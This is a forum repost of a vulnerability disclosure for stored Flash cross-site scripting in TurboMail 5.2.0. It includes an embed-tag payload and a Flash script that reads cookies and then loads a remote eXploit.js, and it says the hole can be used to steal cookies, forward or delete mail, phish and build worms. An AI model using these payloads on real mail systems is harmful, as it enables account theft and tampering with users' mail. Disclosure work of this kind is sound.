ztommy 發表於 2017-10-25 19:26:05

Turbomail郵件系統正文持久型XSS漏洞

漏洞作者:路人甲簡要描述:郵件系統對郵件內容過濾不嚴格,導致存儲型跨站。詳細說明:1、TurboMail郵件系統對郵件內容過濾不嚴格,導致存儲型FLASH跨站,打開郵件即可觸發漏洞,由於FLASH文件可以執行javascript代碼,所以我們可以利用此漏洞進行盜取用戶信息、用戶郵件、釣魚、修改用戶設置、轉發郵件等操作。涉及版本v5.2.0漏洞證明:TurboMail下載地址:http://www.turbomail.org/download.html測試瀏覽器:Firefox29.0.1、Chrome33.0.1750.149 m1、寫郵件,使用代理對請求進行攔截,本次使用burp suite,修改htmlbody字段值(即郵件內容),如下圖所示:


嵌入的惡意代碼解碼後的內容為:<embed allowscriptaccess="always" width="0%" height="0%" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shock-wave-flash" src ="http://127.0.0.1/xss.swf"></embed>xss.swf內的腳本代碼為:getURL("javascript:alert(document.cookie)");2、用戶打開郵件,漏洞觸發:


3、使用Firebug查看頁面源代碼:


flash文件成功插入,且允許執行腳本代碼4、修改xss.swf文件內容,import flash.external.ExternalInterface;ExternalInterface.call("eval","d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e) ;");//使用ExternalInterface.call()函數加載本地腳本文件,通過修改本地腳本文件內容我們可以進行盜取用戶信息、用戶郵件、釣魚,編寫蠕蟲等操作。通過修改eXploit.js文件內容,我們可以進行盜取cookie,轉發郵件、刪除用戶郵件等操作。


頁: [1]
查看完整版本: Turbomail郵件系統正文持久型XSS漏洞